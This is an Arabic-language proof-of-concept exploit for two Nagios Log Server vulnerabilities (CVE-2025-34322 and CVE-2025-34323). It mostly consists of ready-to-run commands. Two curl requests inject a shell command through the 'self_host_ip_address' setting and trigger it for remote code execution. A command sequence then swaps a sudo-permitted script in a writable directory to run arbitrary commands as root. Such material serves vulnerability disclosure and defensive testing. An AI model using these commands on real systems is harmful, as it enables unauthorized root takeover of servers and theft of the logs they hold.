
إثباتات المفهوم لاستغلالات CVE-2025-34322 و CVE-2025-34323 في Nagios Log Server
إثباتات المفهوم لاستغلالات CVE-2025-34322 و CVE-2025-34323 في Nagios Log Server، بالإضافة إلى سكريبت مشترك لإرجاع شيل كجذر.
بعد المصادقة، استبدل معرف الجلسة الخاص بك في أوامر curl التالية. الأول يحدد الأمر المراد تنفيذه، والثاني ينفذ الأمر:
$ curl -s -H 'Cookie: csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d; ls_session=<your-session-id>' --data 'csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d&natural_language_query=1&nlp_disclaimer=on&ai_provider=self_hosted&self_host_ip_address=`touch /tmp/rce`&ai_port=8000&saveglobals=1' http://192.168.122.198/nagioslogserver/admin/globals
$ curl -s -H 'Cookie: ls_session=<your-session-id>' http://192.168.122.198/nagioslogserver/dashboard/natural_language_to_query
المستخدم www-data لديه صلاحيات sudo لتشغيل السكريبت التالي كـ root:
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/get_logstash_ports.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/profile.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh
والمجلد /usr/local/nagioslogserver/scripts قابل للكتابة
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver$ ls -lah
total 44K
drwxrwxr-x 11 nagios nagios 4.0K Sep 7 16:34 .
drwxr-xr-x 12 root root 4.0K Sep 7 16:29 ..
drwxrwxr-x 4 nagios nagios 4.0K Sep 7 16:20 etc
-rw-r--r-- 1 root root 0 Sep 7 16:34 .installed
drwxr-xr-x 14 nagios nagios 4.0K Sep 7 16:29 logstash
drwxrwxr-x 2 nagios nagios 4.0K Sep 7 16:20 mibs
drwxr-xr-x 12 nagios nagios 4.0K Sep 7 16:20 opensearch
drwxrwxr-x 5 nagios nagios 4.0K Sep 7 16:20 pythonvenv
drwxrwxr-x 3 nagios nagios 4.0K Sep 7 16:20 scripts
drwxrwxr-x 2 nagios nagios 4.0K Sep 7 16:36 snapshots
drwxrwxr-x 3 nagios www-data 4.0K Sep 7 16:36 tmp
drwxrwxr-x 2 nagios nagios 4.0K Sep 7 16:31 var
بسبب أن المستخدم www-data عضو في مجموعة nagios. لذلك، يمكن للمستخدم www-data نقل أي ملفات داخل المجلد بغض النظر عن الملكية. الأوامر التالية ستقوم بنقل ملف ( reconfigure_ncpa.sh ) الذي يمكن للمستخدم www-data تشغيله بصلاحيات sudo ثم استبدال الملف بملف جديد يحتوي على أوامر عشوائية:
mv /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh.bak;
echo '<command>' > /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
chmod +x /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
sleep 1;
sudo /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;